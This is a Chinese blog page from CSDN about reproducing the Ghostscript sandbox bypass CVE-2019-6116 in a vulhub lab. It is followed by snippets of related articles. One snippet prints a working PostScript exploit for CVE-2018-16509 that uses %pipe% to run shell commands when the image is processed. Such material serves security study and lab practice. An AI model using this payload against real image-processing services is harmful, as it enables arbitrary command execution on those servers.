GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)

最新推荐文章于 2024-05-20 17:06:31 发布
最新推荐文章于 2024-05-20 17:06:31 发布
阅读量304 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117627609
版权

漏洞背景

2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。Artifex Software Ghostscript 9.26版本中存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。该漏洞可以直接绕过 ghostscript 的安全沙箱,导致攻击者可以执行任意命令/读取任意文件。

漏洞复现

下载这个Poc,将图片上传就能够执行id > /tmp/success
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ghostscript沙箱绕过(CVE-2021-3781)分析
Tencent_SRC的博客
10-29 1403
文|腾讯蓝军 路飞0x00 前言Ghostscript是一款Adobe PostScript语言和PDF的解释器软件,被诸多著名应用(如ImageMagick)所使用。9月5日,海外安全研...
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475)复现
HEAVEN569的博客
06-21 552
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475)复现
Python 渗透测试:GhostScript 沙箱绕过.(CVE-2018-16509)
最新发布
网络安全领域___专研者.
05-20 559
GhostScript 沙箱是一种安全机制,用于在受控环境中运行 GhostScript 解释器,以防止恶意代码的执行GhostScript 是一个广泛使用的 PDF 和 PostScript 解释器,通常用于在服务器上处理和渲染这些文件格式。但是,GhostScript 也可能存在安全漏洞,攻击者可以利用这些漏洞执行任意代码。GhostScript 沙箱就是为了解决这个问题而设计的。它将 GhostScript 解释器置于一个受限的执行环境中,限制其访问系统资源的能力。这样可以防止恶意代码在 Ghos
Buuctf GhostScript 沙箱绕过命令执行漏洞CVE-2019-6116)
ch258563的博客
05-30 532
Buuctf GhostScript 沙箱绕过命令执行漏洞CVE-2019-6116)
Node.js-使用Ghostscript命令优化PDF文件大小
08-10
最后,我们调用`gs.run`执行Ghostscript命令,并确保在完成后调用`gs.shutdown`关闭Ghostscript进程。 在实际项目中,你可能需要根据具体需求调整优化参数。例如,如果你的PDF包含大量高分辨率的图像,你可能需要...
ghostscript-9.26-bin
10-12
标题中的"ghostscript-9.26-bin"指的是Ghostscript的9.26版本的二进制发行版,这个版本包含了可执行文件和其他必要的动态链接库(.so文件),使得用户能够在不同的平台上运行和处理PostScript和PDF文件。 ...
ghostscript-9.02.tar.gz
09-03
ghostscript-9.02,用于linux中pdf转图片工具
exportfig-ghostscript-xpdftools.rar
06-05
export_fig可以使matlab更方便的输出图像,如去除白边,保真等,此包提供配置export_fig所需的软件。我写的配套的教程如下:https://blog.csdn.net/Liangontheway/article/details/90903348
使用Ghostscript命令优化PDF-Node.js开发
05-27
gsx-pdf-optimize使用Ghostscript gsx命令优化PDF,例如test / raw_pdf.pdf(由Figma生成)从3.7 MB扩展到642 KB。 安装首先,请确保已在命令中安装了Ghostscript。 在gsx-pdf-optimize使用Ghostscript gsx命令优化...
漏洞靶场】--GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509)
hello word的博客
01-06 2199
环境 exp 把如下代码保存为一个png文件。 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%ls / > /tmp/success && cat /tmp/success) currentdevice putdeviceprops 上传,执行l
Ghostscript开源PDF库中发现关键漏洞
FreeBuf_的博客
07-13 1343
在Linux中广泛使用的PostScript语言和PDF文件开源解释器Ghostscript被发现存在严重远程代码执行漏洞。该漏洞被标记为CVE-2023-3664,CVSS v3评级为9.8,影响10.01.2之前的所有Ghostscript版本,10.01.2是三周前发布的最新版本。据Kroll公司的分析师G. Glass和D. Truman称,他们针对该漏洞开发了一个概念验证(PoC)漏洞,在打开恶意特制文件时可触发代码执行
ghostscript 远程命令执行漏洞复现
andiao1218的博客
08-23 532
影响的版本 <= 9.23(全版本、全平台) Ubuntu 开启 ghostscript sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null 依次输入 legal { null restore } stopped { pop } if legal mark /O...
GhostScript沙箱绕过(命令执行漏洞)CVE-2018-16509
她叫常玉莹
07-27 1008
2018年8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 访问http://192.168.0.104:8080上传poc.png 执行id > /tmp/succ
GhostScript 沙箱绕过命令执行漏洞 CVE-2019-6116 漏洞复现
ADummy的博客
02-24 683
GhostScript 沙箱绕过命令执行漏洞CVE-2019-6116) by ADummy 0x00利用路线 ​ 构造poc png图片—>上传图片—>有回显命令执行 0x01漏洞介绍 ​ 2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。 0x02漏洞复现 将PO
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2019-6116
qq_51577576的博客
12-13 738
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2019-6116 CVE-2019-6116可以直接绕过 ghostscript 的安全沙箱,导致攻击者可以执行任意命令/读取任意文件。
imagemaick的ghostscript RCE漏洞修复
HRay's blog
08-24 802
漏洞信息可以参考imagemaick的ghost script RCE漏洞 目前最全的修复方案参考https://www.kb.cert.org/vuls/id/332928 编辑ImageMagick的policy文件,默认路径为/etc/ImageMagick/policy.xml 在&lt;policymap&gt;标签中增加如下内容 &lt;policy domain="co...
【严重】Artifex Software Ghostscript 任意命令执行漏洞(POC已公开)(CVE-2023-28879)
murphysec的博客
04-18 1331
Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript解析器。 Artifex Ghostscript 10.01.0及之前版本中,如果写入缓冲区的数据比总长度少一个字节,则尝试写入转义字符,导致两个字节被写入。攻击者可通过泄露堆中path_control_active地址,覆写无效字节以禁用沙箱,进而通过PostScript的%pipe%执行任意命令。该漏洞影响 BCPEncode, BCPDecode, TBCPEncode,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值